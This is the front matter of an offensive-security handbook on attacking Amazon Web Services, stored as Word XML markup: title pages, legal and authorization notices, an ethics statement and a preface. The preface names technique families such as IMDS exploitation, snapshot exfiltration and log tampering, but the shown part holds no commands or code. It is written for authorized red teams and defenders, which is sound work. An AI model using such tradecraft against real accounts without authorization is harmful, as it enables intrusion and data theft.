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48CE6A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="751320758"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>A Red-Team Practitioner's Handbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E237B45" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:divId w:val="1431586775"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Offensive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223CD9D7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:divId w:val="1431586775"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Reconnaissance, IAM exploitation, service-level tradecraft, and post-exploitation across Amazon Web Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137DC36E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="400830478"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ADVERSAR</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 ACCOUNT BOUNDAR</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 ST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 SS</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 KM</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EKS / EC</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RDS / Redshif</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EventBridg</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p>
    <w:p w14:paraId="5ABF20E3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="719867657"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Michael Mancuso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715D7AB4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="599681019"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Offensive Security · Cloud Red Team · 2026 Edition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A394E38" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:divId w:val="1548952508"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro"/>
          <w:caps/>
          <w:spacing w:val="120"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Sans Pro"/>
          <w:caps/>
          <w:spacing w:val="120"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>A Red-Team Practitioner's Handbook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A7383" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="96" w:after="24"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS Offensive Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE5922" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="144"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Reconnaissance, IAM exploitation, service-level tradecraft,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>and post-exploitation across Amazon Web Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9E4099" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Michael Mancuso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1420FFDB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="small"/>
        <w:spacing w:before="72" w:after="132"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>First Edition · 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510438F8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="4320"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Copyright and Legal Notice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0A55B7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="small"/>
        <w:spacing w:before="132" w:after="132"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS Offensive Security: A Red-Team Practitioner's Handbook.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> First Edition, 2026. Copyright © 2026 Michael Mancuso. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69871C3A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="small"/>
        <w:spacing w:before="132" w:after="132"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">No part of this publication may be reproduced, stored in a retrieval system, or transmitted in any form or by any means without prior written permission of the author, except for brief quotations used in reviews, academic citation, and authorized corporate training. Inquiries: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>mancusomjm@gmail.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F52D999" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="small"/>
        <w:spacing w:before="132" w:after="132"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Trademarks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Amazon Web Services, AWS, EC2, S3, IAM, Lambda, EKS, ECS, CloudTrail, GuardDuty, Detective, Config, KMS, Secrets Manager, CloudFormation, Organizations, IAM Identity Center, and associated logos are trademarks of Amazon.com, Inc. or its affiliates. MITRE ATT&amp;CK® is a registered trademark of The MITRE Corporation. Kubernetes is a registered trademark of The Linux Foundation. All other trademarks are the property of their respective owners. Use of these names does not imply endorsement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2872BE71" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="small"/>
        <w:spacing w:before="132" w:after="132"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Authorization required.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The techniques described in this book are intended solely for use by qualified security professionals during engagements for which </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>written authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> has been obtained from the lawful owner of each targeted system. Pentesting of AWS resources is governed by the AWS Customer Support Policy for Penetration Testing, which authorizes testing against eight service categories without prior approval and requires advance notification for others. Readers are responsible for reviewing current policy, relevant con</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>tracts, and all applicable laws — including the U.S. Computer Fraud and Abuse Act (CFAA, 18 U.S.C. § 1030), the EU Cybercrime Directive, the UK Computer Misuse Act, and equivalent statutes in their jurisdictions — before exercising any technique described herein.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5500B244" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="small"/>
        <w:spacing w:before="132" w:after="132"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>No warranty.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The author and publisher make no representations or warranties with respect to the accuracy or completeness of the contents of this work and specifically disclaim all warranties, including without limitation warranties of fitness for a particular purpose. The strategies and tooling described may not be suitable for every situation, and AWS service behavior changes frequently — commands, default settings, IAM primitives, and console workflows shown may have evolved since publication. Neither the author nor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>the publisher shall be liable for damages arising herefrom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C3C3E8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="small"/>
        <w:spacing w:before="132" w:after="132"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Ethics.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every attack primitive in this book is paired with a defensive control, a detection opportunity, and a remediation path. Defenders, detection engineers, and platform owners are the intended co-audience. If you are using this text solely to compromise systems you are not authorized to test, put it down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3F4FA7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="small"/>
        <w:spacing w:before="132" w:after="132"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ISBN (print, placeholder): 978-0-00000-000-0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>ISBN (electronic, placeholder): 978-0-00000-001-7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Printed on acid-free paper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADFB898" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>For every operator who reads CloudTrail in anger, every detection engineer who builds the rule nobody saw coming, and every defender who made the blue team fun again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B99409"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Preface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2170D7A4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="lead"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>This book is a practitioner's handbook for red-team operators, offensive security consultants, detection engineers, and cloud platform defenders who need a working model of how attacks actually land in Amazon Web Services — not in theory, not in a curriculum, but on live accounts, under time pressure, against active defenders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010D752A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>What this book is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5483C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It is an operator-grade reference to the attack surface, tradecraft, and post-exploitation options available to an adversary in an AWS account or organization. It is organized around the kill chain — reconnaissance, initial access, identity, lateral movement, persistence, evasion, exfiltration, and impact — and mapped throughout to MITRE ATT&amp;CK for Cloud (IaaS). Each technique is presented with the specific IAM actions, API calls, tooling invocations, and forensic artifacts you will actually observe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515059FC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>What this book is not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1299051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It is not an AWS certification prep guide. It is not a beginner-friendly introduction to the cloud. It assumes you are comfortable with Linux, shell-fu, Python, core AWS concepts (IAM users, roles, policies, STS, regions, VPCs, S3, EC2), and the mechanics of a professional penetration test. It also assumes you respect the rules of engagement, obtain written authorization, and limit blast radius appropriately. If any of those assumptions fails, close the book, sort that out first, and come back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1366314F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>How to read it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527E5C4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Parts I–III build the theoretical and environmental base you need: the threat model, the attack surface, a lab you can detonate safely, the recon methodology, and the identity-plane primitives that underpin almost every AWS compromise. Parts IV–VI move from service-specific attacks (compute, storage, data, containers, serverless) into persistence, evasion, exfil, tooling, CI/CD supply-chain, and finally the reporting and remediation phase that separates a penetration test from a data dump of broken buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A6A23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Experienced operators will get the most value by skimming Parts I–II, reading Part III front to back, and using Parts IV and V as reference. If you are a detection engineer, invert that: start with Part V (Defense Evasion), Chapter 20 (Reporting and Detection), and Appendix D (CloudTrail/Athena queries), then back up to the attack-side chapters for the behaviors those rules need to catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA58C6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>A note on freshness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1C654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AWS publishes breaking changes weekly. A book is a snapshot. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>in this handbook — policy-evaluation abuse, role-trust manipulation, IMDS exploitation, snapshot exfiltration, log tampering — are durable. Specific CLI flags, console flows, default region lists, and service quotas are not. Where a primitive has been partially remediated by AWS (IMDSv2 now default on new AMIs, S3 Block Public Access, the 2022 confused-deputy retrofit) we call it out. Treat every command in this book as a starting point for your own verification against the current AWS API and console. Opin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ions in the margins are the author's.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4565CA87" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Conventions at a glance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D177B6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Chapters open with a short </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>chapter-goal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> box that states the primitives covered and the defensive controls that map to them. Attack techniques are presented in three voices: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>prose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> explains why the primitive works, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>terminal blocks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> show the operator view (dark-themed captures of tool output and CLI invocations), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>operator/defender notes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag tradecraft decisions. See the </w:t>
      </w:r>
      <w:hyperlink w:anchor="conventions" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="none"/>
            <w:lang w:val="en"/>
          </w:rPr>
          <w:t>Conventions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> page for the full key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E50604" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="right"/>
        <w:spacing w:before="480" w:after="132"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
